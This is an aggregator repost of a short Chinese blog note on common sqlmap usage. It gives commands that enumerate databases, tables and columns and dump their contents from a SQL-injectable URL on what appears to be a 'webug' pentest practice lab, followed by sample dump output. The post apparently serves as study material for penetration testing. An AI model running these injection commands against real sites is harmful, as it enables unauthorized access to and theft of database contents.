惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Simon Willison's Weblog
Simon Willison's Weblog
G
Google Developers Blog
Spread Privacy
Spread Privacy
I
InfoQ
V
V2EX
S
Schneier on Security
小众软件
小众软件
C
CERT Recently Published Vulnerability Notes
博客园 - 聂微东
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Stack Overflow Blog
Stack Overflow Blog
T
Threat Research - Cisco Blogs
L
Lohrmann on Cybersecurity
Recent Announcements
Recent Announcements
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Attack and Defense Labs
Attack and Defense Labs
云风的 BLOG
云风的 BLOG
The Hacker News
The Hacker News
S
SegmentFault 最新的问题
C
Cybersecurity and Infrastructure Security Agency CISA
NISL@THU
NISL@THU
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
GbyAI
GbyAI
Latest news
Latest news
S
Secure Thoughts
Project Zero
Project Zero
MongoDB | Blog
MongoDB | Blog
I
Intezer
Security Latest
Security Latest
Apple Machine Learning Research
Apple Machine Learning Research
Vercel News
Vercel News
N
Netflix TechBlog - Medium
V2EX - 技术
V2EX - 技术
量子位
T
Threatpost
T
The Blog of Author Tim Ferriss
Y
Y Combinator Blog
T
Tor Project blog
A
Arctic Wolf
Microsoft Security Blog
Microsoft Security Blog
T
The Exploit Database - CXSecurity.com
大猫的无限游戏
大猫的无限游戏
T
Tailwind CSS Blog
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
C
Check Point Blog
博客园 - Franky
Google DeepMind News
Google DeepMind News
The Register - Security
The Register - Security
The GitHub Blog
The GitHub Blog
L
LINUX DO - 热门话题

博客园 - CrossBug

fiddler右键集成生成python requests请求代码 python3.12 源码静态编译解决AttributeError: module 'sys' has no attribute 'winver' 随便存一下 不想跟上时间的步伐 pytesseract 修改源码后也报错f"{tesseract_cmd} is not installed or it's not in your PATH."解决方法 解决Can't open /usr/lib/grub/update-grub_lib 活了 世界无我 markdown_test 关于mimikatz在webshell运行 用户中心 - 博客园 可用性自动化V3 用户中心 - 博客园 思科设备各级密码: 关于时钟频率 Error when connecting to the GNS3 server: Cannot connect to http://127.0.0.1:3080. Please check if GNS3 is allowed in your antivirus and firewall. And that server version is 2.1.8. GNS3 Could桥接本地网卡报错:unable to create NIO Ethernet for bridge ' Error opening adapter: centos安装GNS3 GNS3 IOU VM
关于sqlmap常用
CrossBug · 2018-07-15 · via 博客园 - CrossBug

--dbs  //列出所有数据库

--current-dbs   //列出当前网站数据库

sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab --tables  //获取xx数据库下的数据表

sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab -T flag --columns //获取xx数据库下的xx数据表下的列

sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab -T flag -C flag --dump //获取xx数据库下的xx数据表下的xx列下的内容

测试:sqlmap -u http://webug.com/pentest/test/sqli/sqltamp.php?gid=1 -D qibo -T qb_ad_compete_user  -C uid,username,yz --dump

Database: qibo
Table: qb_ad_compete_user
[2 entries]
+-----+----------+----+
| uid | username | yz |
+-----+----------+----+
| 1   | admin    | 1  |
| 1   | admin    | 1  |
+-----+----------+----+